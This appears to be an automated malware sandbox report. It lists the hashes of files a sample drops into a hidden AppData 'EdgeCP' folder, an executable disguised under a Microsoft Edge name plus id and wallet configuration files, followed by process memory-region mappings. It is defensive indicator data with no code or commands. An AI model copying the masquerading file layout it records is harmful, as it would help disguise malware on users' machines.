SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\heur.confMD5
8d420eababb7173b1abb86df8fcbd30c
SHA111b77c1218bf308d47bb4b89600d3f72af82d525
SHA2561ccfc7778c058e57f64c2e6b985a2c3ea606f0c34b06ac2f4cd2bcf9706d05ba
SHA512d863762d88eef79119430f81c77291de5dac47a5465a049843366506caa1fe6dfff96c4179b4ae2f9e919a799e138e3f7f61f77a2adc35eb82a5be1c7892628d
-
C:\Users\Admin\AppData\Roaming\EdgeCP\id.confMD5
b00c123d815a930170e26e53e8b25ed6
SHA100d8d13f01b6d19dfac915360ce5bc6f642b1a9d
SHA256f25915f5984850d954669dcd96b8936746cba6479d18b7a373e83f83e83ad3b2
SHA512ddf84c9ba25a25e390f955db9d3e34d9f0d3e2a32fb667d9eafd957c9904c45c8691935e2125661b44c48349070679ff5a142868909ea5f8c1e185fc61b167db
-
C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.confMD5
69bf7238c8e32793411515d8ca5926a9
SHA1d6918bcceab927a036b760a82cadd340d83b8ed1
SHA25657df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66
SHA5124a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
memory/288-75-0x0000000000000000-mapping.dmp
-
memory/316-62-0x0000000000000000-mapping.dmp
-
memory/332-87-0x0000000000000000-mapping.dmp
-
memory/540-167-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/540-159-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/540-160-0x00000000004010B8-mapping.dmp
-
memory/548-190-0x00000000006F0000-0x00000000006F1000-memory.dmpFilesize
4KB
-
memory/548-185-0x0000000000000000-mapping.dmp
-
memory/756-83-0x0000000000000000-mapping.dmp
-
memory/804-192-0x0000000000000000-mapping.dmp
-
memory/836-135-0x00000000004466F4-mapping.dmp
-
memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/844-182-0x0000000000000000-mapping.dmp
-
memory/956-157-0x0000000000401000-mapping.dmp
-
memory/956-156-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/956-166-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/960-88-0x0000000000000000-mapping.dmp
-
memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/976-152-0x000000000044412E-mapping.dmp
-
memory/1036-59-0x0000000075721000-0x0000000075723000-memory.dmpFilesize
8KB
-
memory/1060-191-0x0000000000000000-mapping.dmp
-
memory/1148-184-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1148-179-0x0000000000401000-mapping.dmp
-
memory/1336-80-0x0000000000000000-mapping.dmp
-
memory/1348-84-0x0000000000000000-mapping.dmp
-
memory/1500-178-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/1500-174-0x0000000000401000-mapping.dmp
-
memory/1500-173-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/1596-146-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1596-150-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/1596-147-0x0000000000413E10-mapping.dmp
-
memory/1612-97-0x0000000006080000-0x0000000006081000-memory.dmpFilesize
4KB
-
memory/1612-81-0x0000000002490000-0x0000000002491000-memory.dmpFilesize
4KB
-
memory/1612-66-0x0000000000000000-mapping.dmp
-
memory/1612-69-0x0000000001F10000-0x0000000001F11000-memory.dmpFilesize
4KB
-
memory/1612-76-0x00000000020D0000-0x0000000002D1A000-memory.dmpFilesize
12.3MB
-
memory/1612-85-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/1612-92-0x0000000005FE0000-0x0000000005FE1000-memory.dmpFilesize
4KB
-
memory/1612-98-0x0000000006190000-0x0000000006191000-memory.dmpFilesize
4KB
-
memory/1612-129-0x0000000006310000-0x0000000006311000-memory.dmpFilesize
4KB
-
memory/1612-105-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1612-128-0x0000000006300000-0x0000000006301000-memory.dmpFilesize
4KB
-
memory/1612-113-0x0000000006110000-0x0000000006111000-memory.dmpFilesize
4KB
-
memory/1612-106-0x0000000006240000-0x0000000006241000-memory.dmpFilesize
4KB
-
memory/1660-133-0x00000000060A0000-0x00000000060A1000-memory.dmpFilesize
4KB
-
memory/1660-145-0x0000000006170000-0x0000000006171000-memory.dmpFilesize
4KB
-
memory/1660-71-0x00000000046E0000-0x00000000046E1000-memory.dmpFilesize
4KB
-
memory/1660-65-0x0000000000000000-mapping.dmp
-
memory/1776-177-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1776-169-0x0000000000401108-mapping.dmp
-
memory/1776-168-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1812-89-0x0000000000000000-mapping.dmp
-
memory/1832-183-0x0000000000000000-mapping.dmp
-
memory/2032-140-0x0000000000401074-mapping.dmp
-
memory/2032-139-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/2032-144-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB